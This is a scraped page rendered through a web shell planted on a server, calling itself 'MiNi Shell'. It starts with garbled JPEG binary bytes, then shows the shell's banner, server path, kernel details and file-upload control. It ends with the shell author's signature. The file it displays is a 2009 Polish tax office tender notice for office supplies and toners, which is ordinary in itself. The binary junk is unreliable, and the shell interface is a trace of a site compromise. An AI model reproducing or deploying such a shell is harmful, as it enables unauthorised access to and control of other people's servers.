JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090602/176820-N-2009.html

<p class="kh_header"><b>Złotoryja: PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ PONIŻEJ 133 000 EURO
na dostawę materiałów biurowych i wkładów barwiących
nr sprawy OG 2512-22/2009</b><br>
<b>Numer ogłoszenia: 176820 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Złotoryi , ul. Rynek 42, 59-500 Złotoryja, woj. dolnośląskie, tel. 076 87 83 509, faks 076 87 83 228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us-zlotoryja.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ PONIŻEJ 133 000 EURO
na dostawę materiałów biurowych i wkładów barwiących
nr sprawy OG 2512-22/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów biurowych i wkładów barwiących, oryginalnych i fabrycznie nowych, zgodnie z załączonym formularzem cenowym stanowiącym załącznik nr 4.
Załącznik 4

FORMULARZ CENOWY na materiały biurowe

L.p.	Asortyment	                          Jedn. miary	              Ilość
1	Papier kserograficzny A4 
             o gramaturze 80 gr m2	                 ryza	                         1 500			
2	Papier kserograficzny A3 
             o gramaturze 80 gr m2	                 ryza	                             10			
3	Papier z perforacją 375 x 12 x 1 
             składanka 2000 szt. 	                pudełko	                 12			
4	Koperta biała C6 samoprzylepna 
             z prawym okienkiem op.=1000szt.	       op.	                              15			
5	Koperta biała C6 samoprzylepna op.=1000szt.	 op.	                   5			
6	Koperta biała A4 samoprzylepna	        szt	                             100			
7	Skoroszyt wykonany z białej tektury
             powlekanej A4, z fałdą	                     szt                  	5 500			
8	Blok listowy - 50 kartek	                     szt	                              50			
9	Koszulka krystaliczna A4
         z dziurkowanym marginesem op.=100szt.	         op.	                 75			
10	Zszywki 24 6  1 op.= 1 000szt. 	          op	                200			
11	Tusz do stempli wodny z dozownikiem 
             czerwony - 30 ml. 	                                     szt	                  20			
12	Długopis z wkładem w kolorze niebieskim 
             w plastikowej oprawie Typu REYNOLDS	szt	                250			
13	Kostka papierowa samoprzylepna 
             blok 50 mm x 50mm - 400 kartkowy 
             w rożnych kolorach	                          szt	                 50			
14	Spinacze małe  okrągłe 1 op. = 100 szt.	op	                   50			
15	Worki na śmieci 240 litrów - rulon zwijany
             - 15 szt.	                                                    rulon	                    2			
16	Druk kwitariusz przychodowy A5
            samokopiujący, kopie w różnych kolorach	  szt                   	100			
17	Druk  Polecenie wyjazdu służbowego               szt.	               10			
18	Kalendarz na ścianę, trójdzielny
             z przesuwanym okienkiem	                            szt.	                  18			
19	Kalendarz biurowy stojący na biurko	                szt.	                  50			
20	Taśma samoklejąca przeźroczysta 1,5cm. 
             szerokości	                                         szt.	                  50			



FORMULARZ CENOWY na wkłady barwiące

Lp.	Nazwa artykułu	       Wydajność     Moel       Jedn. miary	  Ilość	
21	Toner OKI B6200/B6250	10 000	09004078	szt.	55			
22	Toner OKI B4400	             3 000	43502302             szt.	3			
23	Toner Xerox Phaser 3420	10 000	106R01034	szt.	1			
24	Toner OKI B4100/B4200	  2 500	1103402	             szt.	3			
25	Toner OKI C5800	             8 000 K 
                                                                                                                                                                   60006000                                                                                     			
26	Toner OKI C5950	8 000 K
6 000 C	43324421-4	szt.	2 komplety 
(3 kolory i 1 czarny)			
27	Toner Lexmark E322	6 000	08A0478	                  szt.	      3			
28	Toner Lexmark T620	30 000	12A6765	                  szt.	       5			
29	Toner Kyocera FS 1800	20 000	TK60	                  szt.	       2			
30	Toner HP 4050	10 000	C4127X	                               szt.	      15			
31	Toner HP 4014	10 000	CC364A	                               szt.	       5			
32	Toner HP 1150	2 500	Q624A	                               szt.	       5			
33	Toner do kserokopiarki	11 000	Konica Minolta BIZHUB 162 szt.    2			
34	Toner do kserokopiarki	30 000	KONICA Minolta 7022    szt.	      3			
35	Toner do kserokopiarki	30 000	KONICA Minolta 7235    szt.	      4			
36	Toner do faxu	5 000	Panasonic  DP 180	                   szt.       2			
37	Toner do faxu	5 000	Panasonic  KX-FL613PD	      szt.       1.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
 1.	spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 ustawy Prawo Zamówień Publicznych
 2.	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy Prawo Zamówień Publicznych
 3.	spełniają wymagania określone w Specyfikacji Istotnych Warunków Zamówienia
 4.	zaakceptują ogólne postanowienia przyszłej umowy, stanowiące załącznik nr 3 do SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu oferta musi  
     zawierać następujące dokumenty:
a)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
b)	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c)	Dotyczy wykonawców, którzy maja siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej. Zamiast dokumentów, o których mowa w pkt. a i b Wykonawca składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału 
w postępowaniu o udzielenie zamówienia albo składania ofert,
-	nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się powyższych dokumentów można je zastąpić dokumentem zawierającym oświadczenie Wykonawcy złożone przed właściwym organem sądowym, administracyjnym, organem samorządu zawodowego lub gospodarczego albo przed notariuszem kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania
Dokumenty składane przez Wykonawcę mającego siedzibę lub miejsce zamieszkania za granicą muszą być złożone w formie oryginału, odpisu, wypisu, wyciągu lub kopii oraz muszą być tłumaczone na język polski oraz poświadczone przez polskie placówki konsularne, stosownie do obowiązujących przepisów.

2. Do oferty Wykonawca dołącza oprócz dokumentów wymienionych w punkcie 1:
a)	wypełniony formularz ofertowy (stanowiący załącznik nr 1)
b)	oświadczenie o spełnianiu warunków udziału w postępowaniu ( stanowiący zał. nr 2)
c)	zaparafowany wzór umowy ( stanowiący załącznik nr 3)
d)	wypełniony formularz cenowy (stanowiący załącznik nr 4).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.us-zlotoryja.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Złotoryi ul. Rynek 42, 59-500 Złotoryja ,  II piętro pokój nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w pok. 2 II piętro ( Sekretariat) do dnia 10-06-2009r., do godz. 10:00, osobiście lub przesłać pocztą..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com